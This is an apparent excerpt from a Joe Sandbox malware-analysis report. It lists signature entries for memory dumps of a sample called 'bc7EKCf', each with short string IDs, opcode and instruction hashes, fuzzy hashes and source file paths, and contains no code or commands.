                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                    • Opcode ID: af716b36dc2a92313975065069a5d2cb2143254ea68a663631be285f99515127
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c2293de082b0ada4504df36bed6783490341a3d2c598b4e1bdbb2247ac289cb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af716b36dc2a92313975065069a5d2cb2143254ea68a663631be285f99515127
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FF1D6B4A0120ADFCB14CFA8C584A9DBBF2BF49314F158599E805AB369D735EC85CF80
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: Te^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-671973202
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 27f26dca96071e11772d6b0d5449e327a1bab5143fd8913f3f0abb52d9c8ca12
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7da3773449870811bfd49b62d483aa6db518108e582cb91b38b0f32b99694227
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f26dca96071e11772d6b0d5449e327a1bab5143fd8913f3f0abb52d9c8ca12
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13D17A74B00625DFDB28DF68C89866ABBF2FF88316F14856CD5469B798DB30E801CB41
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: Xbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-63242295
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 848ec04da0b37ac7ab385f71a07ed6f22c67f3187cf90766d9992f16b9af2c4e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a9a45197d1bd04c0460526fb8a3c17f1fedc8a5a2334deaceed5e1ef1361204
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 848ec04da0b37ac7ab385f71a07ed6f22c67f3187cf90766d9992f16b9af2c4e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE11374A10659DFCB18DF59C4889A8BBF6FF49304F2585A5E8099F220D734EE89CF90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 87007b726ae1e471ad4de427138ace53da5885f4794f60c09449d6e4979f8473
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4990e3b9c01f7432b33239408ccbbb67949b20fd4916cc64dee40420add79c2b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87007b726ae1e471ad4de427138ace53da5885f4794f60c09449d6e4979f8473
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90A13DB5A002189FCB04EFE8D4506EEBBB2FF88314F104069D506BB7A4DE35AD46DB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8d77cbccc66f77d81b3e4294799c2415acbb6970699104c1396014ad3cec5f77
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d7b677b39a1c96e100b5d5b823e00dcdf212e008e8f6eeb66a01303b3148e5e2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d77cbccc66f77d81b3e4294799c2415acbb6970699104c1396014ad3cec5f77
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A181FBF474010A8FCB94AA78951C53B26E77FC5719B224A6AC407CF3A4EEA1CC56C752
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b17707f9c3e4dc4961db193f126ae6c12aae3023ac21036762cb6023c894f701
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 490347706b34efbace55b8048a43024f4109d82b7a9553b1f944ec0b3f685bfe
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b17707f9c3e4dc4961db193f126ae6c12aae3023ac21036762cb6023c894f701
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B481BCF0B9520E9FCF645A39851C53A36EA7FC5648B104A56C432CF3A8EEA5CC45C7A3
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 61874743f1c6f33f2cde9828ecc26e986f63474d104cd568012f4a8afabed3d3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1bfbf1f8cef7ebb129e029c0e3c924c8298ea97192d50201689c32b550b1748d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61874743f1c6f33f2cde9828ecc26e986f63474d104cd568012f4a8afabed3d3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07A13A35D0062A9FCB11CF94C884BDEFBB2FF46301F168199E548BB261D771A989CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f61afe5aa642fdc1b065e4c093b458e7732ebe9ceb1fccbbe3f30568172f251
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e3cd9777d3c1209778ce8ba32a8dd88c8bbf3cb87a7c187de95afadc06ce0df9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f61afe5aa642fdc1b065e4c093b458e7732ebe9ceb1fccbbe3f30568172f251
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 939180B5A00259DFCB01CFA8C4806AEBBF2FF49348F24855AD845EB355DB35AD45CB90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: W
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-655174618
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a14f9a0af74c9eac5c557d69cb254a3516515a5f7a6c485a9215080d5ebf13fa
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 848a4f2faf5c9aad0b2ffb112de2e60f1cbb41b71da29907183f1b35e2fa2201
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a14f9a0af74c9eac5c557d69cb254a3516515a5f7a6c485a9215080d5ebf13fa
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08A1E375A11219DFCB19DFA4E994A9EBBB6FF88314F148059F902A7364CB31EC12CB50
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: @b^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4063865119
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d529bf2ddb53ea8bb01864f888c81827f3763182a90027588250c01189e3a1d5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b284786b4ef02f518a3dfba6568c1dada3540bdd2459680dea95a1c2799cf95c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d529bf2ddb53ea8bb01864f888c81827f3763182a90027588250c01189e3a1d5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE713374700205CFCB14DF69D588A6ABBF6FF88612B1585A9E406DB772DB34EC41CB60
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c83756aa0fc899f8cdfd17bc39b24fe24be8cc0a2ad5bbfe5cdb9194c9a3841e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 34ec53dd325319406073e62f23d0c205b452d8a853ad6ada162081c690b3df99
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c83756aa0fc899f8cdfd17bc39b24fe24be8cc0a2ad5bbfe5cdb9194c9a3841e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA71FB72D0061ADFDB11CFA5C844ADEBBB6FF89314F158165E909BB220D771A946CF40
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (Acq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1548273396
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f6a93c06a0f0049789454ee8e73c7b451722727f2513a4e628fa3a62640495c8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: affdb64d6c823f2640effd8125e5a3b93e74b8eea6377df44c97c601bda442ed
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6a93c06a0f0049789454ee8e73c7b451722727f2513a4e628fa3a62640495c8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84615EB0B10225DFDB18DF69D898A6EB7BABF84308F144429D806D7394DF749C42CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fc9bf779ad8264804297be966310a4fd4a3d891fb31fdd1d206a79edab17cb35
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7e75ea4d0c6e28a2f669d9c455c50b6cad56ef3b134669968e6b4be65c71b405
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc9bf779ad8264804297be966310a4fd4a3d891fb31fdd1d206a79edab17cb35
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A771E936E006199FDB11CFA4C844BDEB7B2FF8A301F158195E909BB221D771AA85CF51
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0e191cb266387a9c3b5702d8f0425d25cf507785e569e989931a11e1ffdbcb04
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 04bad52b1444cbd3cc5e8e5d551c7e90da3ac5c43d2a7c6c8e5631cd6f6d192a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e191cb266387a9c3b5702d8f0425d25cf507785e569e989931a11e1ffdbcb04
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2518E757012068FCB04DF7EC494A6EBBE6EF8C2117108079E91ADB766DB35ED428B60
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a513317ddf1227912431cb2915e46f547471af46b19615a1c9c39d5576ac743e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 075d8073fbdc2d04519e2792000fad8827657ec528c8df52c780b7089039a852
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a513317ddf1227912431cb2915e46f547471af46b19615a1c9c39d5576ac743e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C614A7AB002159FCB01DF69D88099ABBF6FF8D350B1580A9E919DB321DB31E911DB90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: xbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-73991425
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 25b778ecec17f4ce46764d4150835677625b11199f638078276057a3fd3fad0b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 75e9ae426552c593a74e01d6fe5fb22cf177c90cfd900a0467ed90cb6da4671b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25b778ecec17f4ce46764d4150835677625b11199f638078276057a3fd3fad0b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF6129302043519FD716DF28C8A0B9A7FA2EF85314F1584AEE4858F2A6DB75DC45C791
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 4c^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-396817635
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 79250af8e0e0367b33ce585b90efff9e18330eec3f438892ef97429098b10f23
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5296a2210c345b77ec87fc1d23de14161294124bf3edf82a9e762716060a5fe0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79250af8e0e0367b33ce585b90efff9e18330eec3f438892ef97429098b10f23
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47618FB1600116DBCF44DFA4D480AAAB7FAFF88304F148669EC099B265DB71ED85CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d16858200328aa1315cb4a2aa7979c0795da479085e275c96324c0ddd4aa979c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0faa92b7187fbb92bac57f1148b5bd5c721ac5841e13230d2e2431a346d6b5aa
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d16858200328aa1315cb4a2aa7979c0795da479085e275c96324c0ddd4aa979c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95613B72D0061A9FCF11CFA4C844ADEBBB6FF49314F1581A5E908BB221D771698ACF81
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47425b37a5692fefe257359db0443c51f0ee164c033181d47bc0b951a7a723b8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c653df658941c32ee9ecddd747725a592f638cbffd34bfffccb3bff803ce6600
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47425b37a5692fefe257359db0443c51f0ee164c033181d47bc0b951a7a723b8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051F2317442298FC705DB6DD898AAEBBAAFFC1714B1489AAE505CB3A5DB30DC4187D0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d7c585ae80ab2f4b4bba58a68fcc583b0ccb30778b129bde1f1dcbaa1c8529fe
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 398a441511eea2226c0d528c05ee43a63c36ae3b36314b434063320d00691b5f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7c585ae80ab2f4b4bba58a68fcc583b0ccb30778b129bde1f1dcbaa1c8529fe
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D25143B17442059FCB049B79E85893EBBFAFFC625471441AAE506CB3A1DE34DC05C791
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: Hbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1245868
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c4ce8a02aa7e75a5d425200bc6d2986cd19c37cda8c12221e85b184d61fb41e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e9b223f0f91b1c7613763a0a8860cf43f5d407d8df1e5603b7966d5180b0c264
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c4ce8a02aa7e75a5d425200bc6d2986cd19c37cda8c12221e85b184d61fb41e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F35149757002A18FC7159B78D41457E7FBAEF8562471902A6E505CB3A1CF38DD01C7A1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2003267810.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7640000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: LR^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e18841bfcf14aee9a136ce44b11138f172fe6e2a605ef0365b7db2bd276be9ea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 664bb675277920685ebd07a693c3c11c6249adb9240b6c811f7e436d608fdc49
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e18841bfcf14aee9a136ce44b11138f172fe6e2a605ef0365b7db2bd276be9ea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9514B75B001069FCF18EF7AD59466EBBB2EF88614B148069E80AEF354DA30DC42CB56
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 86e2a9f5bf171d9f9b0076af675556eaeae9ee11d8beba0db177615314ef1e52
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f75f45f009b6e85750d555e2af271039374c47dc6f41837405354d68a32824a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86e2a9f5bf171d9f9b0076af675556eaeae9ee11d8beba0db177615314ef1e52
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9416D753006018F8B08AB7ED494A6ABBE7EFD8622325407AE606CB776DF74DC028750
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (Acq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1548273396
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1dd82f5a70fc8b7c25dc24ce2c942e88876a1951a83b4ec9c4f2c1d108f01c63
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f9af481cac5429b1020110fe61fa41a561d599487e151ea3aa255efd90528e8e
